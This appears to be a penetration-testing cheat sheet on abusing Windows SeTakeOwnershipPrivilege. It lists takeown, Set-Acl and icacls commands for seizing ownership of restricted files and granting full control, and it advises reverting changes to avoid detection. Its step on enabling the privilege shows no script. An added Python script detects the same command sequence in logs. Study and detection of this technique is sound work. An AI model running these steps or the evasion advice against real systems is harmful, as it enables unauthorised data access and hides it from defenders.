Exploiting SeTakeOwnershipPrivilege

Overview

SeTakeOwnershipPrivilege lets its holder take ownership of files and folders without first being granted access to them. Because an object's owner can always rewrite its access control list (ACL), the holder can then grant themselves access to restricted data.


Approach

1. Verify Privileges

whoami /priv  # Check for SeTakeOwnershipPrivilege

2. Enable Privilege (if required)

Use PowerShell scripts such as:

3. Identify Target Files/Folders

Locate sensitive files and gather metadata:

Get-ChildItem -Path <directory> -Recurse  # Enumerate files
cmd /c dir /q  # Check file owner

4. Take Ownership of Target File

takeown /f <target>

OR using PowerShell:

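$acl = Get-Acl <target>; $acl.SetOwner([System.Security.Principal.NTAccount]'<user>')  # Set the new owner on the ACL object
Set-Acl -Path <target> -AclObject $acl  # Write the changed owner back to the file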

5. Modify ACLs to Gain Access

icacls <target> /grant <user>:F  # Full control to user

6. Access Data

cat <target>  # Read the file

OR:

type <target>

7. Revert Changes

Reset ownership and ACLs to avoid detection:

icacls <target> /reset  # Replaces the ACL with inherited defaults; the owner is not changed
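
Steps 4, 5 and 7 leave a recognisable command sequence in process-creation logs. The following is an added detection example, not part of the original page: it flags an account that runs takeown and then icacls /grant on the same path, and records whether icacls /reset followed. The pipe-separated record format, the sample events and the 10-minute window are assumptions; the input is modelled on Security event 4688 with command-line auditing enabled.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (timestamp|account|command line), in
# the shape of Security event 4688 with command-line auditing enabled.
SAMPLE_EVENTS = r"""
2024-05-01T10:00:02|CORP\svc_report|whoami /priv
2024-05-01T10:01:10|CORP\svc_report|takeown /f "C:\Dept\HR\salaries.xlsx"
2024-05-01T10:01:25|CORP\svc_report|icacls "C:\Dept\HR\salaries.xlsx" /grant svc_report:F
2024-05-01T10:03:40|CORP\svc_report|icacls C:\Dept\HR\salaries.xlsx /reset
2024-05-01T11:00:00|CORP\admin1|icacls C:\Tools\build.log /grant Users:R
2024-05-01T12:00:00|CORP\admin2|takeown /f C:\Temp\old.txt
""".strip().splitlines()

PATH = r'(?:"([^"]+)"|(\S+))'  # quoted or unquoted path
TAKEOWN = re.compile(r'\btakeown(?:\.exe)?\s+/f\s+' + PATH, re.I)
ICACLS = re.compile(r'\bicacls(?:\.exe)?\s+' + PATH + r'\s+/(grant|reset)\b', re.I)

def parse(line):
    """Return (time, user, action, path), or None for unrelated commands."""
    ts, user, cmd = line.split("|", 2)
    m = TAKEOWN.search(cmd)
    if m:
        action = "takeown"
    else:
        m = ICACLS.search(cmd)
        if not m:
            return None
        action = m.group(3).lower()
    path = (m.group(1) or m.group(2)).lower()  # Windows paths are case-insensitive
    return datetime.fromisoformat(ts), user.lower(), action, path

def find_ownership_grabs(lines, window=timedelta(minutes=10)):
    """Flag takeown followed by icacls /grant on the same path by the same
    account within `window`; note whether an icacls /reset followed."""
    pending, findings = {}, []
    for ts, user, action, path in sorted(filter(None, map(parse, lines))):
        key = (user, path)
        if action == "takeown":
            pending[key] = ts
        elif action == "grant" and key in pending and ts - pending[key] <= window:
            findings.append({"user": user, "path": path, "taken": pending.pop(key),
                             "granted": ts, "reset_after": False})
        elif action == "reset":
            for f in findings:
                if (f["user"], f["path"]) == key and ts - f["granted"] <= window:
                    f["reset_after"] = True
    return findings
```

A grant without a preceding takeown, or a takeown with no grant, is not reported, which keeps routine single-command administration out of the results.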

Tools & Techniques

Commands Used:

  • whoami /priv

  • takeown /f <target>

  • icacls <target> /grant <user>:F

  • Get-ChildItem

  • cmd /c dir /q

  • cat <target> / type <target>

  • Set-Acl

Tools:

  • PowerShell scripts for privilege enabling

Techniques:

  • Use SeTakeOwnershipPrivilege to gain access to restricted files/folders.

  • Modify ACLs to grant read/write permissions.

  • Revert changes post-exploitation to avoid disruption.


Notes

  • This technique requires SeTakeOwnershipPrivilege to be enabled.

  • Always revert permissions and ownership post-exploitation to reduce forensic artifacts.
